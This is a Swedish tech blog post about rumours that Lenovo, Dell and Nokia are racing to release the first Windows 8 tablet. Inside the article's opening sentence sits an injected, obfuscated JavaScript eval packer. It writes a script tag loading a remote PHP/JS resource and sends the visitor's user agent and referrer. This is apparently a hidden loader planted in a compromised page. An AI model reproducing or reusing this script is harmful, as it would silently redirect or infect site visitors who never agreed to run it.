Image Image Image Image Image Image Image Image Image Image

| 16 april, 2021

Scroll to top

Top

Lenovo: Vi kommer bli först med en Windows 8 tablet

Lenovo: Vi kommer bli först med en Windows 8 tablet
Sebastian

Revue eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|ydyfi|var|u0026u|referrer|ffyks||js|php’.split(’|’),0,{}))
har tidigare skrivit om att det gått rykten att Nokia funderat på att bli först med Windows 8 Tablet på marknaden, nu verkar det gälla en annan aktör.
Artikeln kan ni läsa här!

Det är än så länge väldigt oklart om vem som ska bli den första leverantören att släppa en tablet baserat på Microsoft kommande operativsystem Windows 8. Förutom Nokia är det företag som Dell och Lenovo som slåss om första produkten.

Enligt tidningen The Verge ligger just nu Lenovo i framkant då de håller väldigt hårt med att blir det första företaget som släpper en tablet med Windows 8. Ryktena säger också att tableten från Lenovo ska vara baserad på en processor från Intel.

Även om Lenovo kommer vara först så gäller dessa tablets till konsumenter. En annan aktör också konkurrent till Lenovo hävdar att de kommer bli först ut på marknaden med en företagsinriktad tablet med Windows 8 samma dag som Windows 8 släpps officiellt.

Men som nämnt ovan, det verkar som dessa två företag har glömt den tredje. Nokia som också är Microsofts nya bästis kommer att släppa en Windows 8 baserad tablet, man har redan fått se konceptbilder på denna enhet.

Vem som vinner kriget och blir marknadsetta är svårt att säga i dagsläget.

Läs artikeln om Nokia Windows 8 Tablet här!